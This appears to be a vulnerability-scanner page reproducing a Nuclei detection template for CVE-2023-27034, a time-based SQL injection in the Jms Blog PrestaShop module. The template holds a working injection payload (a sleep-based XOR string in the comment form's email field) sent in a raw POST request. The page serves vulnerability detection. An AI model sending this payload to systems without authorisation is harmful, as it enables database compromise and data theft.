Jms Blog - SQL Injection

ID: CVE-2023-27034

Severity: critical

Author: MaStErChO

Tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters

Description

The module Jms Blog (jmsblog) from Joommasters contains a Time Based SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes

YAML Source

id: CVE-2023-27034

info:
  name: Jms Blog - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    The module Jms Blog (jmsblog) from Joommasters contains a Time Based SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and its underlying infrastructure.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
    - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
    - https://github.com/advisories/GHSA-7jr7-v6gv-m656
    - https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html
    - https://github.com/codeb0ss/CVE-2023-27034-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27034
    cwe-id: CWE-89
    epss-score: 0.01204
    epss-percentile: 0.85171
    cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 2
    vendor: joommasters
    product: jms_blog
    framework: prestashop
  tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(tolower(body), "jmsblog")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
        X-Requested-With: XMLHttpRequest

        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="comment"

        555
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="customer_name"


        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="email"

        0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="post_id"

        1
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="post_id_comment_reply"

        1
        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="submitComment"

        submitComment=
        ------------YWJkMTQzNDcw--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
# digest: 4b0a00483046022100bf00035e7c6584991eeb9bf7b9c0b8632b6b25169f71bed397ea40b60ccc4aec022100f21e1745c7fd3a44a19f93832d0b946a2c908eff3e68b3e3d21135b828759d84:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-27034.yaml"

View on Github